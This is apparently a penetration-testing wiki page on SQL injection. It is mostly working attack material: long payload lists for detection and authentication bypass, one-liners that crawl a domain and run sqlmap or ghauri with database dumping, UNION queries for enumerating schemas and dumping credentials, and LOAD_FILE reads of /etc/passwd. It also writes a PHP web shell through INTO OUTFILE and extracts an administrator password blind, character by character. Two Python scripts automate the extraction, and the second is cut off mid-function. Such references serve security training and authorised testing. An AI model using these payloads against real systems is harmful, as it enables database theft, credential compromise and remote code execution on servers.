# SQL Injection

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% content-ref url="../protocols/mysql-3306" %}
[mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306)
{% endcontent-ref %}

{% content-ref url="../protocols/mssql-1433" %}
[mssql-1433](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mssql-1433)
{% endcontent-ref %}

{% content-ref url="../tools/sqlmap" %}
[sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap)
{% endcontent-ref %}

```php
// user input is concatenated straight into the query string
$searchInput = $_POST['findUser'];
$query = "select * from logins where username like '%$searchInput'";
$result = $conn->query($query);
```

```sql
select * from logins where username like '%$searchInput'
```

Payload:

```
1'; DROP TABLE users;'
```

Resulting query:

```sql
select * from logins where username like '%1'; DROP TABLE users;'
```

The first `'` closes the string, `;` ends the statement, and the trailing `'` opens a string that is never closed, so the DBMS rejects the input with a syntax error. That leaked error is the first sign of injection, whether or not the driver allows stacked queries:

```
Error: near line 1: near "'": syntax error
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FZziw0JfIPGmJ72r22C76%2Fimage.png?alt=media&#x26;token=353b7c4f-2b77-4b4d-8686-476cd0d42b8c" alt=""><figcaption><p>Type of SQLi</p></figcaption></figure>

## Cheatsheet

{% embed url="<https://tib3rius.com/sqli>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection/cheat-sheet>" %}

## One Liners

{% embed url="<https://github.com/xnl-h4ck3r/urless>" %}

```
$ waymore -i urls | tee urls-his
$ cat urls-his | gf sqli |urless| anew sqli
$ ghauri -m sqli --confirm --batch --level=3  -b
```

{% embed url="<https://github.com/h6nt3r/tools/blob/main/oneliners/sql_Injection.md?s=03>" %}

Install [urlfinder](https://github.com/projectdiscovery/urlfinder), [qsreplace](https://github.com/tomnomnom/qsreplace), [anew](https://github.com/tomnomnom/anew), [ghauri](https://github.com/r0oth3x49/ghauri) and sqlmap first.

#### SQLi All

```
urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;ghauri -m sqli.txt --random-agent --confirm --force-ssl --level=3 --dbs --dump --batch
```

#### Blind SQLi

```
urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;sqlmap -m sqli.txt --technique=BT --level=5 --risk=3 --tamper=space2comment,sleep2getlock,space2randomblank,between,randomcase,randomcomments,bluecoat,ifnull2ifisnull --batch --random-agent --no-cast --current-db --hostname
```

#### Time Based SQLi

```
urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;sqlmap -m sqli.txt --technique=T --level=5 --risk=3 --tamper=space2comment,space2plus,space2randomblank,space2morehash,between,randomcase,charencode,symboliclogical --batch --random-agent --no-cast --time-sec=10 --current-db --count
```

## SQLi Discovery

| Payload | URL Encoded |
| ------- | ----------- |
| `'`     | `%27`       |
| `"`     | `%22`       |
| `#`     | `%23`       |
| `;`     | `%3B`       |
| `)`     | `%29`       |

### Recon

{% embed url="<https://infosecwriteups.com/mastering-sql-injection-recon-step-by-step-guide-for-bug-bounty-hunters-9f493fb058dd>" %}

{% embed url="<https://adce626.github.io/SQLi-Pentest-Toolkit/>" %}

### Nmap

```
nmap --script http-sql-injection -p 80 example.com
```

## Generic Payloads

```
'
''
`
``
,
"
""
/
//
\
\\
;
'--
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
'+OR+1=1--
' OR 1=1--
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%6c%75%33%6b%79%31%33' AND 1=CAST((SELECT version()) AS int) --

# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

# Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

======================================

#      hash comment
-- -   SQL line comment (MySQL needs whitespace after --)
/* */  C-style / in-line comment
/*…*/
;%00   null byte terminator
%00
`      backtick
+      addition, string concatenation (or a space when URL-encoded)
||     (double pipe) concatenation in Oracle/PostgreSQL (OR in MySQL unless PIPES_AS_CONCAT)
%      LIKE wildcard
@      local (user-defined) variable
@@     global/system variable
```

### Polyglot

```
&1/*'/*"/**/||1#\
and-1/*'/*"/**/||1--+\
```

## Authentication Bypass

```sql
SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd';
```

```sql
admin' or '1'='1
```

```sql
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
```

Username field:

{% hint style="info" %}
*Use a known username.* `AND` binds tighter than `OR`, so in `username='admin' or '1'='1' AND password='...'` the tautology only neutralises the password check; the `username='admin'` term still has to match a real row.
{% endhint %}

```
administrator'--
```

```
' OORR 1<2 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'a'='a
' or a=a--
' or a=a--
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one--
' or uid like '%
' or uname like '%
' or userid like '%
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
```

Password field:

```
' or ''='
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
```

### Fuzzing

{% hint style="success" %}
*Start with "*[*Generic Payload*](#generic-payloads)*" List*
{% endhint %}

{% content-ref url="fuzzing" %}
[fuzzing](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/fuzzing)
{% endcontent-ref %}

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FJWqrLKv0lWWHBjOCvKQp%2Fimage.png?alt=media&#x26;token=626687b8-85e2-424c-be41-aa486060a614" alt=""><figcaption></figcaption></figure>

## Comments

MySQL supports two line-comment styles, `-- ` (followed by whitespace) and `#`, plus the in-line comment `/**/`.

## Auth Bypass with comments

```
admin'--
```

```sql
SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FoSf5bjwXiJsLHbgJvsvC%2Fimage.png?alt=media&#x26;token=4ed9528a-3a3b-4ec4-8ee2-0d826ee5583a" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
MySQL only treats `--` as a comment when it is followed by whitespace. A trailing space is easily lost in a URL or form field, so `-- -` or `--+` (the `+` decodes to a space) is the safer form.
{% endhint %}

```
admin')--
```

```sql
SELECT * FROM logins where (username='admin')
```

```
user' or id=5 ) --   test
```

```
SELECT * FROM logins WHERE (username='user' or id=5 ) -- test' AND id > 1) AND password = '******'
```

## ID parameter

```
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="security"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
```

## Header Injection

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

## Union

```
MariaDB [employees]> select * from employees limit 5;
+--------+------------+------------+-------------+--------+------------+
| emp_no | birth_date | first_name | last_name   | gender | hire_date  |
+--------+------------+------------+-------------+--------+------------+
|  10001 | 1953-09-02 | Georgi     | Facello     | M      | 1986-06-26 |
|  10002 | 1952-12-03 | Vivian     | Billawala   | F      | 1986-12-11 |
|  10003 | 1959-06-16 | Temple     | Lukaszewicz | M      | 1992-07-04 |
|  10004 | 1956-11-06 | Masanao    | Rahimi      | M      | 1986-12-16 |
|  10005 | 1962-12-11 | Sanjay     | Danlos      | M      | 1985-08-01 |
+--------+------------+------------+-------------+--------+------------+
5 rows in set (0.038 sec)

MariaDB [employees]> select * from departments limit 5;
+---------+------------------+
| dept_no | dept_name        |
+---------+------------------+
| d009    | Customer Service |
| d005    | Development      |
| d002    | Finance          |
| d003    | Human Resources  |
| d001    | Marketing        |
+---------+------------------+
5 rows in set (0.022 sec)

MariaDB [employees]> select dept_no from departments union select emp_no from employees;
```

{% embed url="<https://portswigger.net/web-security/sql-injection/union-attacks>" %}

{% embed url="<https://www.sqlinjection.net/union/>" %}

{% embed url="<https://sqlwiki.netspi.com/injectionTypes/unionBased/#mysql>" %}

### Detect number of columns - Using ORDER BY

{% embed url="<https://sqlwiki.netspi.com/injectionTypes/errorBased/#mysql>" %}

```sql
' order by 1-- -
```

```sql
' order by 2-- -
```

Increase the number until a value returns an error.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FeDxIi5oB8WxYSeWmCMPX%2Fimage.png?alt=media&#x26;token=834b42d3-f916-43af-9e3d-8bed4612209c" alt=""><figcaption></figcaption></figure>

`order by 5` errors while `order by 4` does not, so this query returns exactly 4 columns.

```sql
cn' UNION select 1,2,3,4-- -
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FCDuflixyI7HiIZN3LBHw%2Fimage.png?alt=media&#x26;token=5de994c8-6834-499b-837a-7833eb157f2d" alt=""><figcaption></figcaption></figure>

While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection.

{% hint style="info" %}
In this example the first column is never rendered by the page, so anything injected there is not shown. Use one of the displayed positions (here the second column).
{% endhint %}

```sql
cn' UNION select 1,@@version,3,4-- -
```

{% embed url="<https://portswigger.net/web-security/sql-injection/union-attacks>" %}

{% embed url="<https://www.sqlinjection.net/union/>" %}

{% embed url="<https://sqlwiki.netspi.com/injectionTypes/unionBased/#mysql>" %}

### Detect number of columns - using NULL

```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
etc.
```

### Detect data type

```
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```

If the column data type is not compatible with string data, the injected query will cause a database error, such as:

`Conversion failed when converting the varchar value 'a' to data type int.`
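The column-count and column-position steps above, automated end to end as an added Python example (not from the page) against a constructed SQLite table. The `ports`/`credentials` schema, the `vulnerable_search` endpoint and the rule that the page renders every column except the first are assumptions for the demo. SQLite has no `@@version`, so the last step dumps a second table instead; on MySQL the concatenation would be `CONCAT()` rather than `||`, and the data-type probe is omitted because SQLite is dynamically typed and never raises the conversion error quoted above.

```python
import sqlite3


# Constructed demo schema (not from the page): the table the app queries and the one we want.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ports(code TEXT, city TEXT, volume INTEGER, id INTEGER);
        INSERT INTO ports VALUES ('CN SHA', 'Shanghai', 43, 1), ('SG SIN', 'Singapore', 37, 2);
        CREATE TABLE credentials(username TEXT, password TEXT);
        INSERT INTO credentials VALUES ('admin', 's3cr3t'), ('dev', 'devpass');
    """)
    return conn


def vulnerable_search(conn, user_input):
    """Simulated search endpoint: input lands inside a LIKE string, as in the page's PHP."""
    query = f"SELECT code, city, volume, id FROM ports WHERE code LIKE '%{user_input}%'"
    return conn.execute(query).fetchall()


def rendered(rows):
    """Assumed page behaviour: column 1 is never printed, the rest are."""
    return [row[1:] for row in rows]


def count_columns_order_by(conn, max_cols=20):
    """ORDER BY n succeeds while n <= column count; the first failure gives the answer."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(conn, f"cn' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None


def count_columns_union_null(conn, max_cols=20):
    """UNION SELECT NULL,... only parses once the NULL count matches the column count."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_search(conn, f"cn' UNION SELECT {nulls}-- -")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def find_printed_columns(conn, ncols):
    """Inject numeric markers and see which of them survive into the rendered output."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = rendered(vulnerable_search(conn, f"cn' UNION SELECT {markers}-- -"))
    shown = {cell for row in rows for cell in row if isinstance(cell, int) and 1 <= cell <= ncols}
    return sorted(shown)


def dump_credentials(conn, ncols, slot):
    """Put the interesting expression in a printed slot and keep markers elsewhere."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = "username || ':' || password"   # CONCAT() on MySQL
    payload = f"cn' UNION SELECT {','.join(cols)} FROM credentials-- -"
    rows = rendered(vulnerable_search(conn, payload))
    return [cell for row in rows for cell in row if isinstance(cell, str) and ":" in cell]


if __name__ == "__main__":
    conn = build_db()
    n = count_columns_order_by(conn)
    print("columns (ORDER BY):", n, "| (UNION NULL):", count_columns_union_null(conn))
    printed = find_printed_columns(conn, n)
    print("printed positions:", printed)
    print("dump via slot", printed[0], "->", dump_credentials(conn, n, printed[0]))
```

Both counting methods return 4 here; the UNION-based one is the one to reach for when `ORDER BY` is filtered or the application swallows ordering errors, and the marker step is what tells you that injecting into position 1 would be wasted.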

## Database Enumeration

### Fingerprinting

{% embed url="<https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql>" %}

| Payload            | When to Use                      | Expected Output                                     | Wrong Output                                              |
| ------------------ | -------------------------------- | --------------------------------------------------- | --------------------------------------------------------- |
| `SELECT @@version` | When we have full query output   | MySQL Version 'i.e. `10.3.22-MariaDB-1ubuntu1`'     | In MSSQL it returns MSSQL version. Error with other DBMS. |
| `SELECT POW(1,1)`  | When we only have numeric output | `1`                                                 | Error with other DBMS                                     |
| `SELECT SLEEP(5)`  | Blind/No Output                  | Delays page response for 5 seconds and returns `0`. | Will not delay response with other DBMS                   |

| Database type    | Query                     |
| ---------------- | ------------------------- |
| Microsoft, MySQL | `SELECT @@version`        |
| Oracle           | `SELECT * FROM v$version` |
| PostgreSQL       | `SELECT version()`        |

```
' UNION SELECT @@version--
```

### Database

```
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
5 rows in set (0.01 sec)
```

```sql
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
```

Find the current database with the `SELECT database()` query:

```sql
cn' UNION select 1,database(),2,3-- -
```

### Tables

```sql
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
```

```
SELECT * FROM information_schema.tables
```

```
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
```

### Columns

```sql
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
```

```
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
```

```
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users'--
```

### Data

{% hint style="info" %}
Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.
{% endhint %}

```sql
cn' UNION select 1, username, password, 4 from dev.credentials-- -
```

```
'+UNION+SELECT+username,+password+FROM+users--
```

Retrieve multiple values in a single column (Oracle and PostgreSQL use `||`; MySQL uses `CONCAT()`):

```
' UNION SELECT username || '~' || password FROM users--
```

## Reading Files

{% content-ref url="../protocols/mysql-3306" %}
[mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306)
{% endcontent-ref %}

{% embed url="<https://www.exploit-db.com/papers/14635>" %}

### DB User

```sql
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
```

```sql
cn' UNION SELECT 1, user(), 3, 4-- -
```

```sql
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
```

### User Privileges

```sql
SELECT super_priv FROM mysql.user
```

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FNvv5rNmuqZ3VZKXRQStQ%2Fimage.png?alt=media&#x26;token=24c60cee-0e82-4f0c-a224-7ead93ec137d" alt=""><figcaption></figcaption></figure>

`Y` means the user holds the `SUPER` privilege.

If we had many users within the DBMS:

```sql
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
```

Other privileges:

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
```

```sql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
```

If `FILE` is listed for our user, we can read files and, depending on `secure_file_priv` and filesystem permissions, write them too.

### LOAD_FILE

```sql
SELECT LOAD_FILE('/etc/passwd');
```

{% hint style="info" %}
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
{% endhint %}

```sql
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```

```sql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
```

```
# Load File 
http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user--

## Bypass Filters
Load File - "/etc/passwd":) load_file(0x2f6574632f706173737764)
Load File - "/etc/passwd":) load_file(char(47,101,116,99,47,112,97,115,115,119,100))

# Into OutFile
http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--
```

## Write Files

To be able to write files to the back-end server using a MySQL database, we require three things:

1. User with `FILE` privilege enabled
2. MySQL global `secure_file_priv` variable empty (a directory path restricts file operations to that directory; `NULL` disables them entirely)
3. Write access for the MySQL OS user to the location we want to write to on the back-end server

```sql
SHOW VARIABLES LIKE 'secure_file_priv';
```

```sql
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
```

On MySQL 5.7+ this table lives in `performance_schema.global_variables`; `information_schema.global_variables` still works on MariaDB.

```sql
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```

If the `secure_file_priv` value is empty, files can be read from and written to any location the MySQL OS user can access.

```sql
SELECT * from users INTO OUTFILE '/tmp/credentials';
```

```sql
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
```

{% hint style="info" %}
Tip: Advanced file exports utilize the 'FROM\_BASE64("base64\_data")' function in order to be able to write long/advanced files, including binary data.
{% endhint %}

### Web Shell

{% hint style="info" %}
Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use `load_file` to read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config`, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using [this wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or [this wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt). Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.
{% endhint %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FKyZenR4lcrN7FaZjRc05%2Fimage.png?alt=media&#x26;token=9888a645-c399-4d89-b82f-ccd8618c7cc7" alt=""><figcaption></figcaption></figure>

```sql
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F6gHVR8Cl5ELARg3zXBj5%2Fimage.png?alt=media&#x26;token=ed0dc434-72ed-421f-b517-9319bc184058" alt=""><figcaption></figcaption></figure>

{% content-ref url="../shells/web-shell" %}
[web-shell](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/web-shell)
{% endcontent-ref %}

{% content-ref url="../shells/bind-and-reverse-shell" %}
[bind-and-reverse-shell](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/bind-and-reverse-shell)
{% endcontent-ref %}

***

## Resources

{% embed url="<https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet>" %}

* <https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/>
* <https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/SQL%20Injection/>
* <https://book.hacktricks.xyz/pentesting-web/sql-injection>
* <https://cheatsheet.haax.fr/web-pentest/injections/server-side-injections/sql/>
* <https://sqlwiki.netspi.com/#mysql>
* <https://portswigger.net/web-security/sql-injection/cheat-sheet>

## Payloads

* <https://github.com/payloadbox/sql-injection-payload-list> - Also see: <https://github.com/payloadbox/sql-injection-payload-list/tree/master/Intruder>
* <https://github.com/CyberM0nster/SQL-Injection-Payload-List-/tree/master>
* <https://github.com/coffinxp/payloads/blob/main/allsqli.txt>

***

## Blind SQL Injection - Conditional Response

Confirm injection by adding quote

```
/search?query='
/search?query=''
/search?query='''
```

{% embed url="<https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/blindsqli.txt>" %}

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
```

Returns the true-condition response ⇒ the first character of the password is greater than `m`

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 't
```

Returns the false-condition response ⇒ the first character is not greater than `t`

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
```

Returns the true-condition response ⇒ the first character is `s`

2nd character

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 2, 1) = 'e
```

3rd character

```
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 3, 1) = 'c
```

And so on

```
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FyEwoP8I6L6au5jLZofE7%2Fimage.png?alt=media&#x26;token=1dbf8eec-48e9-4777-93c5-78bb1b4e43ed" alt=""><figcaption></figcaption></figure>

```
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,2) FROM users WHERE username='administrator')='n§a§
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FHoIGbDVSmoHJYOp7MJua%2Fimage.png?alt=media&#x26;token=cfd6c673-a4ba-40ef-947b-b4b4e3fbfef6" alt=""><figcaption></figcaption></figure>

```
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,3) FROM users WHERE username='administrator')='n5§a§
```

Etc.

### Detect length

```
xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Feivkm2KMx8U0ef3rw4Sc%2Fimage.png?alt=media&#x26;token=14db9bf0-14b9-4ef5-b8f5-2230fdca2184" alt=""><figcaption></figcaption></figure>

## Blind Time Based SQLi

```
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if (now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(), sleep(5),0)
'XOR(if(now()=sysdate(), sleep(5),0))XOR'
'XOR(if (now()=sysdate(), sleep(5*1),0))OR'
```

## Time Based SQL Injection

```
'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--
```

* The first of these inputs does not trigger a delay, because the condition `1=2` is false.
* The second input triggers a delay of 10 seconds, because the condition `1=1` is true.

Test one character at a time

```
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
```

Retrieve password - PostgreSQL

```
|| CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'),1,1) = 'a') THEN pg_sleep(5) ELSE pg_sleep(0) END -- 
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FYxGCaBqy4dAzRIPnKNeK%2Fimage.png?alt=media&#x26;token=6ee591cb-2681-483e-ab1d-9ead5874e388" alt=""><figcaption></figcaption></figure>

```
' || CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'),1,2) = 'ea') THEN pg_sleep(5) ELSE pg_sleep(0) END --
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FEaASZrSBFa5B5oQ4NSAr%2Fimage.png?alt=media&#x26;token=c9579bf3-26fe-483e-8a3d-8650abd33648" alt=""><figcaption></figcaption></figure>

Etc.

```
XOR(if(now()=sysdate(),sleep(5),0))XOR
```

Increase Time Delay to confirm injection

```
'; WAITFOR DELAY '00:00:05' --
'; WAITFOR DELAY '00:00:10' --
'; WAITFOR DELAY '00:00:20' --
```
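The character-by-character probes in the "Blind SQL Injection - Conditional Response" section and the time-delay probes in this section are one algorithm with two different oracles. This added Python example (not from the page) runs it offline against a constructed SQLite database: the `tracking`/`users` tables, the `vulnerable_lookup` endpoint, the registered `sleep()` standing in for MySQL's, and the 0.1 s delay are all assumptions. It replaces the page's linear guessing with a binary search over printable ASCII and compares against `char(n)`, so the probe never has to quote the character it is testing.

```python
import sqlite3
import time

DELAY = 0.1  # seconds the gated sleep() blocks; anything over half of it counts as "delayed"
SECRET = "(SELECT password FROM users WHERE username='administrator')"


def build_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no sleep(); register one so the time-based channel works offline.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'n5ecr3t'), ('wiener', 'peter');
        CREATE TABLE tracking(id TEXT);
        INSERT INTO tracking VALUES ('xyz');
    """)
    return conn


def vulnerable_lookup(conn, tracking_id):
    """Simulated endpoint: the TrackingId cookie is concatenated into the query."""
    return conn.execute(f"SELECT id FROM tracking WHERE id = '{tracking_id}'").fetchall()


def boolean_oracle(conn):
    """Conditional response: a row (the page's 'Welcome back') comes back only if cond is true."""
    def ask(cond):
        return bool(vulnerable_lookup(conn, f"xyz' AND ({cond})-- -"))
    return ask


def time_oracle(conn):
    """Conditional delay: cond gates a sleep(); the response time is the only signal."""
    def ask(cond):
        start = time.monotonic()
        vulnerable_lookup(conn, f"xyz' AND (CASE WHEN ({cond}) THEN sleep({DELAY}) ELSE 0 END)-- -")
        return time.monotonic() - start >= DELAY / 2
    return ask


def find_length(ask, max_len=64):
    """Smallest n for which LENGTH(secret) > n is false, by binary search (log2(max_len) queries)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"LENGTH({SECRET}) > {mid}"):
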